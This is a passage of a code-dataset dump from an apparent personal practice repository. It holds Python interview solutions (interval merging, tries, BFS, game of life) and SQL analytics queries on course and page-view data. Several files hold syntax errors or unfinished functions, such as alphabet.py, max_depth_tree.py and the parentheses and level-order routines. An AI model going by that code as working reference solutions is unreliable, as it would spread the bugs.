"text": "map=[\n ['0', 'O', 'O', 'O'],\n ['O', 'O', 'O', 'O'],\n ['D', 'O', 'O', 'O'],\n ['X', 'O', 'D', 'O']]\n\nprint(map)\n\n\n\ndef TresureIsland(map):\n\n if not map:\n return -1\n\n TREASURE, DANGER, SAFE, VISITED = 'X', 'D', 'O', 'V'\n\n queue = [(0,0)]\n steps = 0\n\n while queue:\n queue_temp = []\n for x, y in queue:\n for x_dif, y_dif in [[0,1],[0,-1],[1,0],[-1,0]]:\n cur_x = x + x_dif\n cur_y = y + y_dif\n\n if 0 <= cur_x < len(map) and 0 <= cur_y < len(map[0]):\n if map[cur_x][cur_y] == TREASURE:\n return steps + 1\n if map[cur_x][cur_y] == SAFE:\n queue_temp.append((cur_x,cur_y))\n map[x][y] = VISITED\n steps +=1\n queue = queue_temp\n return -1\n\n\n#print (min_steps(map))\n\nprint(TresureIsland(map))\n"
},
{
"alpha_fraction": 0.5920826196670532,
"alphanum_fraction": 0.5966724157333374,
"avg_line_length": 21.063291549682617,
"blob_id": "e8cf1aa1068d451eecc5611f68ffc3775935b6fa",
"content_id": "37fa74d744fe1703c1b5629a3123d59f0839e245",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1743,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 79,
"path": "/alphabet.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nWrite a function that returns whether a list of strings is sorted given a specific alphabet.\nA list of N words and the K-sized alphabet are given.\n\ninput: words = [ \"cat\", \"catt\", \"cbt\", \"bat\", \"tab\"]\n alphabet = ['c', 'b', 'a', 't']\noutput: True\n\n'''\n\ndef sortedWords(words, alphabet):\n\n if len(words) <= 1:\n return True\n\n if len(alphabet) == 0:\n return True\n\n prevWord = words[0]\n\n\n for index in range(1: len(words)- 2):\n curWord = words[index]\n\n for position, character in enumerate(prevWord):\n\n if position > len(curWord) -1:\n return False\n\n if character not in alphabet:\n return False\n\n if alphabet.index(character) < alphabet.index(prevWord[position]:\n return False\n\n if alphabet.index(character) > alphabet.index(prevWord[position]:\n break\n\n prevWord = curWord\n\n\n return True\n\n\n# tests\n\nwords = [\"cat\", \"cbt\", \"bat\", \"tab\"]\nalphabet = ['c', 'b', 'a', 't']\n\n\nprint(sortedWords(words, alphabet)) #False\n\n\n\n\n'''\nGiven a string with alpha-numeric characters and parentheses, return a string with balanced parentheses by removing the fewest characters possible. You cannot add anything to the string.\nBalanced parentheses means that each opening parenthesis has a corresponding closing parenthesis and the pairs of parentheses are properly nested.\n\n\n'aaa(bb)c(aa)aa(a'\n'aaa(bb)c(aa)aaa'\n\n'''\n\n[('(', 9) ]\n\ndef replaceParentheses( string):\n\n\n stack = []\n for index, char in enumerate(string):\n\n if char == '(':\n stack.append(('(', index))\n\n if char == ')':\n if stack[len(stack)][0] == '(':\n stack.pop(len(stack))\n"
},
{
"alpha_fraction": 0.5530303120613098,
"alphanum_fraction": 0.5984848737716675,
"avg_line_length": 15.375,
"blob_id": "db31dbce19c6780467ffa1e22d8fbe6647c3e5c2",
"content_id": "5bd9b26e68d66fe2f06ecbea016a0e1874dcf1a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 132,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 8,
"path": "/repeatNum.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\n'''\n Find the non repeated number in an array\n'''\narr = [1, 5, 8, 1, 8]\nresult = 0\nfor num in arr:\n result ^= num\n print(result)\n"
},
{
"alpha_fraction": 0.5569972395896912,
"alphanum_fraction": 0.6033363938331604,
"avg_line_length": 26.66666603088379,
"blob_id": "bfa44b13f8f9c5c4271523a79bfa6456417e60da",
"content_id": "7228182e63a603a83d695d63659989765a133152",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1079,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 39,
"path": "/merge_intervals.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nGiven an array of intervals where intervals[i] = [starti, endi], merge all overlapping intervals,\nand return an array of the non-overlapping intervals that cover all the intervals in the input.\n\n\nExample 1:\n\nInput: intervals = [[1,3],[2,6],[8,10],[15,18]]\nOutput: [[1,6],[8,10],[15,18]]\nExplanation: Since intervals [1,3] and [2,6] overlaps, merge them into [1,6].\nExample 2:\n\nInput: intervals = [[1,4],[4,5]]\nOutput: [[1,5]]\nExplanation: Intervals [1,4] and [4,5] are considered overlapping.\n\n'''\n\nclass Solution(object):\n def merge(self, intervals):\n \"\"\"\n :type intervals: List[List[int]]\n :rtype: List[List[int]]\n \"\"\"\n\n\n if len(intervals) == 0: return []\n\n intervals = sorted(intervals, key=lambda x: x[0])\n merged_intervals = [intervals[0]]\n\n for session in intervals[1:]:\n if session[0] <= merged_intervals[-1][1]:\n merged_intervals[-1][1] = max(merged_intervals[-1][1], session[1])\n else:\n merged_intervals.append(session)\n\n\n return merged_intervals\n"
},
{
"alpha_fraction": 0.7514106631278992,
"alphanum_fraction": 0.7551724314689636,
"avg_line_length": 31.212121963500977,
"blob_id": "c5dae68c288cc7f20956114843c7af4559f00338",
"content_id": "ef428b8e41b1b6d2af9e928490c1ac2a2cf8eedb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 3190,
"license_type": "no_license",
"max_line_length": 151,
"num_lines": 99,
"path": "/data_model.ddl",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\n'''Creating Tables'''\n\nCREATE OR REPLACE TABLE data.Users (\n user_id INT64 NOT NULL, # primary_key\n first_name STRING,\n last_name STRING,\n email STRING,\n gender STRING,\n join_date DATE,\n country STRING,\n city STRING,\n language STRING\n)\n\nCREATE OR REPLACE TABLE data.Courses (\n course_id STRING NOT NULL, # primary_key\n instructor_id STRING NOT NULL, # forign key to instructors table\n title STRING,\n description STRING,\n)\n\nCREATE OR REPLACE TABLE data.Instructors (\n instructor_id INT64 NOT NULL, # primary_key\n first_name STRING,\n last_name STRING,\n email STRING,\n institution STRING,\n bio STRING,\n join_date DATE\n)\n\nCREATE OR REPLACE TABLE data.Modules (\n course_id STRING NOT NULL, # super_key, forign key to courses table\n module_id STRING NOT NULL, # super_key\n module_order INT64,\n module_description STRING,\n)\n\nCREATE OR REPLACE TABLE data.Items (\n module_id STRING NOT NULL, # super_key, forign key to modules table\n item_id STRING NOT NULL, # super_key\n item_type STRING,\n item_week STRING,\n item_order INT64,\n item_content STRING,\n)\n\nCREATE OR REPLACE TABLE data.Offerings (\n course_id STRING NOT NULL, # super_key, forign key to courses table\n start_date DATE NOT NULL, # super_key\n end_date DATE,\n)\n\n\nCREATE OR REPLACE TABLE data.Registrations (\n user_id INT64 NOT NULL, # super_key, forign key to users table\n course_id STRING NOT NULL, # super_key, forign key to courses table\n registration_date DATE,\n completion_date DATE\n)\n\nCREATE OR REPLACE TABLE data.Activity (\n user_id INT64 NOT NULL, # super_key, forign key to users table\n course_id STRING NOT NULL, # super_key, forign key to courses table\n module_id STRING NOT NULL, # super_key, forign key to modules table\n item_id STRING NOT NULL, # super_key, forign key to items table\n activity_type STRING, # ex: start, complete, view\n activity_ts TIMESTAMP\n)\n\n'''Load raw data from course_funnel_assignment.csv to course-funnel-assignment.data.raw_data first.\nThen insert results of each of below query to populate the tables'''\n\n# populate Users table\nSELECT DISTINCT user_id FROM course-funnel-assignment.data.raw_data\n\n# populate Courses table\nSELECT DISTINCT course_id FROM course-funnel-assignment.data.raw_data\n\n# populate Modules table\nSELECT DISTINCT course_id, module_id, module_order FROM course-funnel-assignment.data.raw_data\n\n# populate Items table\nSELECT DISTINCT module_id , item_id FROM course-funnel-assignment.data.raw_data\n\n# populate Offerings table\nSELECT course_id, MIN(DATE(item_start_ts)) AS start_date , MAX(DATE( item_complete_ts )) AS end_date\nFROM course-funnel-assignment.data.raw_data\nGROUP BY course_id\n\n# populate Registrations table\nSELECT user_id, course_id, MIN(DATE(item_start_ts)) AS registration_date FROM course-funnel-assignment.data.raw_data\nGROUP BY user_id, course_id\n\n# populate Activity table\nSELECT user_id, course_id, item_id, module_id, item_start_ts AS activity_ts, 'start' AS activity_type FROM course-funnel-assignment.data.raw_data\nUNION ALL\nSELECT user_id, course_id, item_id, module_id, item_complete_ts AS activity_ts, 'complete' AS activity_type FROM course-funnel-assignment.data.raw_data\nWHERE item_complete_ts IS NOT NULL\n"
},
{
"alpha_fraction": 0.4867967963218689,
"alphanum_fraction": 0.5407577753067017,
"avg_line_length": 17.53191566467285,
"blob_id": "341cc520ad2f1641a3fe0a247f3849612f1d1468",
"content_id": "b8caa49349700b7b7b5f81f1c8271ba0475b69b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 871,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 47,
"path": "/number_pad_recursion.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "a = [4, 6, 3,3,3,3,9]\n\n\nmapping = { 2:['A','B','C'], 3: ['D','E','F'], 9:['W','X', 'Y', 'Z'] }\n\n\ndef rec_function( letters , numbers):\n if numbers == []:\n print(''.join(letters))\n return\n\n digit = numbers[0]\n\n #print(mapping[digit][0])\n\n #print(letters)\n #print(numbers)\n\n l1 = letters[:]\n l2 = letters[:]\n l3 = letters[:]\n l1.append(mapping[digit][0])\n l2.append(mapping[digit][1])\n l3.append(mapping[digit][2])\n\n #print(l1)\n #print(l2)\n #print(l3)\n\n if digit == 7 or digit == 9:\n l4 = letters[:]\n l4.append(mapping[digit][3])\n\n #print(l4)\n\n rec_function(l1, numbers[1:])\n rec_function(l2, numbers[1:])\n rec_function(l3, numbers[1:])\n rec_function(l4, numbers[1:])\n\n else:\n rec_function(l1, numbers[1:])\n rec_function(l2, numbers[1:])\n rec_function(l3, numbers[1:])\n\n\nrec_function([], [2,9,3])\n"
},
{
"alpha_fraction": 0.5399113297462463,
"alphanum_fraction": 0.5709534287452698,
"avg_line_length": 22.128204345703125,
"blob_id": "ec6a11f85649f0df167df80c7946ec221d0a3bed",
"content_id": "b5c833bc3cfbe4852ac4e3488fee9671b0dfdcd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 902,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 39,
"path": "/merge_linklist.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nMerge two sorted linked lists\nGiven two sorted linked lists, merge them so that the resulting linked list is also sorted.\nConsider two sorted linked lists and the merged list below them as an example.\n'''\n\n\ndef merge_sorted(head1, head2):\n #TODO: Write - Your - Code\n newHead = None\n\n while head1 or head2:\n if head1 and head2:\n if head1.data > head2.data:\n if newHead == None:\n newHead = head2\n cur = newHead\n else:\n cur.next = head2\n cur = head2\n head2 = head2.next\n else:\n if newHead == None:\n newHead = head1\n cur = head1\n else:\n cur.next = head1\n cur = head1\n head1 = head1.next\n elif head1 is None:\n cur.next = head2\n cur = head2\n head2 = head2.next\n else:\n cur.next = head1\n cur = head1\n head1 = head1.next\n\n return newHead\n"
},
{
"alpha_fraction": 0.6004902124404907,
"alphanum_fraction": 0.6397058963775635,
"avg_line_length": 23,
"blob_id": "97de972343be2e61c10ad5a9ab197807bb1886de",
"content_id": "5d609e04070dd1445c9d317e4e97bca4a0451ffd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 818,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 34,
"path": "/levelordertree.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nLevel Order Traversal of Binary Tree\nGiven the root of a binary tree, display the node values at each level.\n Node values for all levels should be displayed on separate lines. Let’s take a look at the below binary tree.\n\n100\n50\n200\n25\n75\n350\nLevel order traversal for this tree should look like: 100; 50, 200; 25, 75, 350\n'''\n\ndef level_order_traversal(root):\n result = \"\"\n #TODO: Write - Your - Code\n if root is None:\n return result\n\n queue = [root]\n result += str(root.data) + \" \"\n\n while len(queue) != 0:\n size = len(queue)\n for i in range(size):\n node = queue.pop(0)\n\n if node.left is not None:\n result += str(node.left.data) + \" \"\n queue.append(node.left)\n if node.right is not None:\n result += str(node.right.data) + \" \"\n queue.append(node.right)\n"
},
{
"alpha_fraction": 0.7080972790718079,
"alphanum_fraction": 0.7370876669883728,
"avg_line_length": 43.791046142578125,
"blob_id": "24a5bf0b73aca0c58df82d6534c6149fbfc7978f",
"content_id": "3852793ed45a209431734409d5017ce5785530fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 3001,
"license_type": "no_license",
"max_line_length": 173,
"num_lines": 67,
"path": "/course_funnel.sql",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "SELECT\n *\n FROM\n UNNEST(GENERATE_DATE_ARRAY('2016-01-01', '2016-12-31', INTERVAL 1 DAY)) AS example\n\n\n WITH dates AS (\nSELECT date FROM UNNEST(GENERATE_DATE_ARRAY('2016-01-01', '2016-12-31', INTERVAL 1 DAY)) AS date),\n\nWeekly_Course_Actives AS (\nSELECT dates.date, course_id, COUNT(DISTINCT user_id) AS Weekly_Course_Actives FROM `course-funnel-assignment.data.raw_data` JOIN dates\nON DATE(item_start_ts) >= DATE_SUB(dates.date, INTERVAL 6 DAY) AND DATE(item_start_ts) <= dates.date\nGROUP BY dates.date, course_id\nORDER BY dates.date, course_id )\n\n\n\n'''\nans #b\nSELECT started_cur_7_day.date, started_cur_7_day.course_id, COUNT(DISTINCT started_cur_7_day.user_id) FROM started_cur_7_day JOIN started_prev_7_day\nON started_cur_7_day.date = started_prev_7_day.date AND started_cur_7_day.course_id = started_prev_7_day.course_id AND started_cur_7_day.user_id = started_prev_7_day.user_id\nGROUP BY started_cur_7_day.date, started_cur_7_day.course_id\nORDER BY started_cur_7_day.date, started_cur_7_day.course_id\n'''\n\n'''\nans #c\nSELECT started_cur_7_day.date, started_cur_7_day.course_id, COUNT(DISTINCT started_cur_7_day.user_id) FROM started_cur_7_day JOIN completed_modules_in_past\nON started_cur_7_day.date = completed_module_in_past.date AND started_cur_7_day.course_id = completed_modules_in_past.course_id\n AND started_cur_7_day.user_id = completed_modules_in_past.user_id AND started_cur_7_day.module_id != completed_modules_in_past.module_id\nGROUP BY started_cur_7_day.date, started_cur_7_day.course_id\nORDER BY started_cur_7_day.date, started_cur_7_day.course_id\n'''\n\n'''\n#passed the course\nSELECT dates.date, course_id, module_id, user_id FROM completed_modules_in_past JOIN dates\nON DATE(item_start_ts) >= DATE_SUB(dates.date, INTERVAL 6 DAY) AND DATE(item_start_ts) <= dates.date\nGROUP BY dates.date, course_id, module_id, user_id\nORDER BY dates.date, course_id, module_id, user_id\n'''\n\n\n\nWITH dates AS (\nSELECT date FROM UNNEST(GENERATE_DATE_ARRAY('2016-01-01', '2016-12-31', INTERVAL 1 DAY)) AS date),\n\nstarted_cur_7_day AS (\nSELECT dates.date, course_id, module_id, user_id FROM `course-funnel-assignment.data.raw_data` JOIN dates\nON DATE(item_start_ts) >= DATE_SUB(dates.date, INTERVAL 6 DAY) AND DATE(item_start_ts) <= dates.date\nGROUP BY dates.date, course_id, module_id, user_id\nORDER BY dates.date, course_id, module_id, user_id ),\n\n\nstarted_prev_7_day AS (\nSELECT dates.date, course_id, user_id FROM `course-funnel-assignment.data.raw_data` JOIN dates\nON DATE(item_start_ts) >= DATE_SUB(dates.date, INTERVAL 13 DAY) AND DATE(item_start_ts) <= DATE_SUB(dates.date, INTERVAL 7 DAY)\nGROUP BY dates.date, course_id, user_id\nORDER BY dates.date, course_id, user_id)#,\n\n#completed_modules_in_past AS (\nSELECT dates.date, course_id, module_id, user_id, FROM `course-funnel-assignment.data.raw_data` JOIN dates\nON DATE(item_complete_ts) <= dates.date\nGROUP BY dates.date, course_id, module_id, user_id\nHAVING COUNT(item_id) >= 4\nORDER BY dates.date, course_id, module_id, user_id\n#)\n"
},
{
"alpha_fraction": 0.5285451412200928,
"alphanum_fraction": 0.5745856165885925,
"avg_line_length": 23.68181800842285,
"blob_id": "6d0de0b16f8e047dd32be7eb3a31cfea1a61e3b5",
"content_id": "ef50964e818fb7922e67770ef063f94640777727",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 543,
"license_type": "no_license",
"max_line_length": 41,
"num_lines": 22,
"path": "/binary_search.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "def binary_search(input_array, value):\n \"\"\"Your code goes here.\"\"\"\n\n low = 0\n high = len(input_array) - 1\n\n while low <= high:\n middle = (low + high)/2\n\n if input_array[middle] == value:\n return middle\n elif input_array[middle] < value:\n low = middle + 1\n elif input_array[middle] > value:\n high = middle - 1\n return -1\n\ntest_list = [1,3,9,11,15,19,29]\ntest_val1 = 25\ntest_val2 = 15\nprint binary_search(test_list, test_val1)\nprint binary_search(test_list, test_val2)\n"
},
{
"alpha_fraction": 0.3512820601463318,
"alphanum_fraction": 0.5269230604171753,
"avg_line_length": 17.571428298950195,
"blob_id": "4bc08527dc7d62a36e3ee63642dcb9b84112d49a",
"content_id": "7dafb97ee752b5f10c382de3ac7e5c95c6007557",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 780,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 42,
"path": "/sumStrings.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nInput : str1 = \"3333311111111111\",\n str2 = \"44422222221111\"\nOutput : 3377733333332222\n\n'''\ndef sumStrings(str1, str2):\n str1 = str1[::-1]\n str2 = str2[::-1]\n\n str_sum = \"\"\n sum = 0\n digit = 0\n carry = 0\n\n\n while len(str1) > 0 or len(str2) > 0:\n num1 = str1[:1]\n num2 = str2[:1]\n str1 = str1[1:]\n str2 = str2[1:]\n\n\n int_num1 = int(num1) if num1 else 0\n int_num2 = int(num2) if num2 else 0\n\n sum = int_num1 + int_num2 + carry\n\n digit = sum%10\n carry = sum//10\n\n str_sum = str_sum + str(digit)\n\n\n if carry != 0:\n str_sum = str_sum + str(carry)\n\n return str_sum[::-1]\n\n\nresult = sumStrings(\"3333311111111111\",\"44422222221111\")\nprint(result) # '3377733333332222'\n"
},
{
"alpha_fraction": 0.43677374720573425,
"alphanum_fraction": 0.4736842215061188,
"avg_line_length": 20.8358211517334,
"blob_id": "e5b98535894318e5a7404015b19d598d4e138b5f",
"content_id": "5b32fbf521e4f143e0659a990a66e75a16a56431",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1463,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 67,
"path": "/game_of_life.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "# gol\n\n'''\nImplement game of life -> https://en.wikipedia.org/wiki/Conway%27s_Game_of_Life\n\n'''\n\nimport random\n\nMAX_COL = 25\nMAX_ROW = 40\n\n\nmatrix = [[0 for i in range(MAX_COL)] for j in range(MAX_ROW)]\nnew_matrix = [[0 for i in range(MAX_COL)] for j in range(MAX_ROW)]\n\n\nfor i in range(MAX_ROW):\n for j in range(MAX_COL):\n matrix[i][j] = random.randint(0,1)\n\ndef printGrid(matrix):\n for i in range(MAX_ROW):\n print(matrix[i])\n\nprintGrid(matrix)\n\ndef getsum(grid, x, y):\n\n # (0 - 1 + 10) % 10 => 9\n # (9 + 1 + 10) % 10 => 0\n\n sum = 0\n for i in [-1,0,1]:\n for j in [-1,0,1]:\n sum += matrix[(x + i + 10) % 10][(y + j + 10) % 10]\n\n return sum\n\ndef getNextGen(matrix):\n for i in range(MAX_ROW):\n for j in range(MAX_COL):\n sum = getsum(matrix, i, j)\n\n # rule #1\n if (matrix[i][j] and sum < 2):\n new_matrix[i][j] = 0\n # rule #2\n elif (matrix[i][j] and (sum == 2 or sum ==3)):\n new_matrix[i][j] = 1\n # rule #3\n elif (matrix[i][j] and sum > 3):\n new_matrix[i][j] = 0\n # rule #4\n elif (not matrix[i][j] and sum == 3):\n new_matrix[i][j] = 1\n\n else:\n new_matrix[i][j] = matrix[i][j]\n\n return new_matrix\n\n\nfor i in range(10):\n print('\\n-------------------------\\n')\n matrix = getNextGen(matrix)\n printGrid(matrix)\n"
},
{
"alpha_fraction": 0.6965853571891785,
"alphanum_fraction": 0.7248780727386475,
"avg_line_length": 25.230770111083984,
"blob_id": "b2bdbe671df0d12b52b1c840a757c4fb5c08a126",
"content_id": "6292e5e7e42270acb2cee958fedf09c89add4ba2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1025,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 39,
"path": "/course_experiment.sql",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\n\nTables\n\ncourses\n\"course_id\",\"class_size\"\n\ncourse_ownership\n\"course_id\",\"prof_id\"\n\nexperiments\n\"experiment_id\",\"course_id\"\n\nprofessors\n\"prof_id\",\"name\",\"email\",\"created_at\",\"is_tophat\"\n\nresponses\n\"response_id\",\"created_at\",\"course_id\",\"response\",\"correct\"\n\n\nWITH experiment_courses AS (\n SELECT experiment_id, course_id FROM experiments\n WHERE experiment_id = '257'\n)\n\ncorrect_responses_test AS (\n SELECT experiment_id, correct FROM responses JOIN experiment_courses ON responses.course_id = experiment_courses.course_id\n WHERE DATE(created_at) >= DATE('2019-3-1') AND DATE(created_at) <= ('2019-5-1')\n)\n\n\ncorrect_responses_control AS (\n SELECT experiment_id, correct FROM responses\n WHERE DATE(created_at) >= DATE('2019-3-1') AND DATE(created_at) <= ('2019-5-1')\n AND responses.course_id NOT IN (SELECT course_id FROM experiment_courses)\n\n)\n\nSELECT CAST( COUNT(CASE WHEN correct = 'TRUE' THEN 1 ELSE 0 END), FLOAT) / CAST( COUNT(*), FLOAT) AS correct_percentage\nFROM correct_responses_test\nGROUP BY experiment_id\n"
},
{
"alpha_fraction": 0.5838621854782104,
"alphanum_fraction": 0.5883952975273132,
"avg_line_length": 22.46808433532715,
"blob_id": "fa081ccd8081f5c3319f482b7d8abd7415d8e757",
"content_id": "b0ba6cc901650da355beae054ae9a30148df9c86",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1103,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 47,
"path": "/max_depth_tree.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "'''\nGiven a binary tree, find its maximum depth.\n\nThe maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.\n\nNote: A leaf is a node with no children.\n\n'''\n\n\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n\n depth = []\n\n def maxDepth_helper(self, root, cur_d):\n\n if root.left is None and root.right is None:\n self.depth.append(cur_d)\n return\n\n elif root.left is not None and root.right is None:\n self.maxDepth_helper(root.left, cur_d += 1)\n\n elif root.right is not None and root.left is None:\n self.maxDepth_helper(root.right, cur_d += 1)\n\n else:\n self.maxDepth_helper(root.left, cur_d += 1)\n self.maxDepth_helper(root.right, cur_d += 1)\n\n\n def maxDepth(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n self.maxDepth_helper(root, 0)\n\n return max(depth)\n"
},
{
"alpha_fraction": 0.506486177444458,
"alphanum_fraction": 0.506486177444458,
"avg_line_length": 20.88888931274414,
"blob_id": "2447faa91729e59fc4da2d1b85ebbe7874e02811",
"content_id": "d84fbde22db075753fa4e78e18cdf88bce4164da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1773,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 81,
"path": "/search.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "#\n# dictionary=['pin', 'pinner', 'present']\n# query='pi'\n# results=['pin', 'pinner']\n#\n\nclass Node(object):\n def __init__(self, value, end):\n self.value = value\n self.end = end\n self.next = {}\n\nclass Dictionary(object):\n def __init__(self):\n self.head = Node(None, False)\n\n def addWord(self, word):\n\n if word is None or word == '':\n return\n\n cur = self.head\n for char in word:\n if char not in cur.next:\n newNode = Node(char, False)\n cur.next[char] = newNode\n\n cur = cur.next[char]\n\n cur.end = True\n\n def __searchHelper(self, word, cur, results):\n\n if cur.end == True:\n results.append(word)\n\n if cur.next.keys() == []:\n return\n\n for key, node in cur.next.items():\n self.__searchHelper(word + node.value, cur.next[key], results)\n\n def search(self, query):\n if query is None or query == '':\n return None\n\n cur = self.head\n\n word = ''\n for char in query:\n if char in cur.next:\n word += char\n cur = cur.next[char]\n else:\n return []\n\n results = []\n self.__searchHelper(word, cur, results)\n return results\n\n def __printHelper(self, cur):\n\n if cur.keys() == []:\n return\n\n for key, node in cur.items():\n print(node.value, node.end)\n self.__printHelper(cur[key].next)\n\n def printDictionary(self):\n cur = self.head.next\n self.__printHelper(cur)\n\n\nd = Dictionary()\nd.addWord('pin')\nd.addWord('pinner')\nd.addWord('present')\nd.printDictionary()\nresult = d.search('pi') # ['pin', 'pinner']\nprint(result)\n"
},
{
"alpha_fraction": 0.5478105545043945,
"alphanum_fraction": 0.5808757543563843,
"avg_line_length": 26.268293380737305,
"blob_id": "116d55c43bffc73fd3dd19890798c44120b12b48",
"content_id": "6a877ebda5b8dbb946be59310fbcaecdfcbaaac1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1119,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 41,
"path": "/faceNet.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\n'''\n Recommend movies watched by friends to users\n'''\n\nmovies_watched=[[1,'A'],[1,'B'],[1,'C'],[2,'A'],[2,'D'],[3,'W'],[3,'E'],[7,'T']]\nusers=[[1,2],[1,8],[2,9],[5,2],[8,3],[9,10]]\n\ndef addtoDict(dict, values):\n if values[0] in dict:\n dict[values[0]].append(values[1])\n else:\n dict[values[0]] = []\n dict[values[0]].append(values[1])\n\ndef recommendation(movies_watched, relationship):\n # code below\n userFriends = {} # {1 : [2,8], 2: [1,9]}\n userMovies = {}\n moviesPerUser = {}\n\n for users in relationship:\n addtoDict(userFriends, [users[0], users[1]])\n addtoDict(userFriends, [users[1], users[0]])\n\n for movies in movies_watched:\n addtoDict(userMovies, movies)\n\n # debug prints\n print(userFriends)\n print(userMovies)\n\n for user, friends in userFriends.items():\n moviesPerUser[user] = set()\n for friend in friends:\n if friend in userMovies:\n for movie in userMovies[friend]:\n moviesPerUser[user].add(movie)\n\n return moviesPerUser\n\nprint(recommendation(movies_watched, users))\n"
},
{
"alpha_fraction": 0.4686567187309265,
"alphanum_fraction": 0.550000011920929,
"avg_line_length": 31.658536911010742,
"blob_id": "1a7ec10460ffb5203b443e8cac270170cad48ca3",
"content_id": "0add3b1550c3c2a12730347622de7c8924fb4f78",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 1340,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 41,
"path": "/page_views.sql",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
"text": "\npage_views:\n\ncookie_id page_ts url referrer\nabc 2018-09-01 1:30 www.coursera.org/learn/ml online.stanford.edu/courses\nabc 2018-09-11 2:40 www.coursera.org/browse gmail.com\ndef 2018-09-05 5:40 www.coursera.org NULL\nghi 2018-09-15 14:10 www.coursera.org/spn/ds m.facebook.com\nghi 2018-09-15 14:20 www.coursera.org www.coursera.org/spn/ds\n\n\nusers:\n\nuser_id reg_cookie_id reg_ts\n123 abc 2018-09-01 2:10\n456 ghi 2018-09-15 15:20\n\n\n\nSELECT referrer, COUNT(DISTINCT cookie_id) cnt FROM page_views\nWHERE referrer NOT LIKE `%www.coursera.org%` AND referrer IS NOT NULL\nGROUP BY referrer\nORDER BY cnt DESC\n\n\nSELECT referrer, (CAST(COUNT(DISTINCT users.user_id), FLOAT)/CAST(COUNT(DISTINCT cookie_id), FLOAT))*100.00 percent\nFROM page_views LEFT JOIN users\nON page_views.cookie_id = users.reg_cookie_id\nGROUP BY referrer\nORDER BY percent DESC\n\n\n\n\n\nreferrer reg_users_cnt reg_rate\npaypal.com 100K 98%\ngithub.com 500K 91%\nfreeonlinetextbooks.com 400K 85%\n...\ngoogle.com 1M 11%\n...\n"
},
{
"alpha_fraction": 0.715575635433197,
"alphanum_fraction": 0.7178329825401306,
"avg_line_length": 21.149999618530273,
"blob_id": "f54ebf2692f309e083ce9b58d1d1ea4ac82d8f9e",
"content_id": "f4411e8f85e86bed3f6c9575c0c3949c73582843",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 894,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 40,
"path": "/applepie.py",
"repo_name": "nperera0/coding",
"src_encoding": "UTF-8",
